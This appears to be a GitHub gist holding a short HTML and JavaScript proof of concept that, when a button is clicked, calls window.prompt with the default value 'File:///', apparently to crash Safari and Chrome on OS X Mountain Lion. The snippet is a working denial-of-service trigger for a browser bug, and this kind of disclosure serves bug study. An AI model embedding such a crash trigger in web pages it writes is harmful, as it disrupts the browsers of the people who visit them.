Skip to content

Instantly share code, notes, and snippets.

@tenkoma
Last active December 12, 2015 02:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tenkoma/4698079 to your computer and use it in GitHub Desktop.
Save tenkoma/4698079 to your computer and use it in GitHub Desktop.
Crash Mac Application(Mountain Lion) Safari, Chrome
<button id="macCrash">App Crash on Mountain Lion!?</button>
<script type="text/javascript">// <![CDATA[
window.addEventListener("load", function(){
var button = document.getElementById("macCrash");
button.addEventListener("click", function(){
window.prompt("Crash!", "File:"+"///");
});
});
// ]]></script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment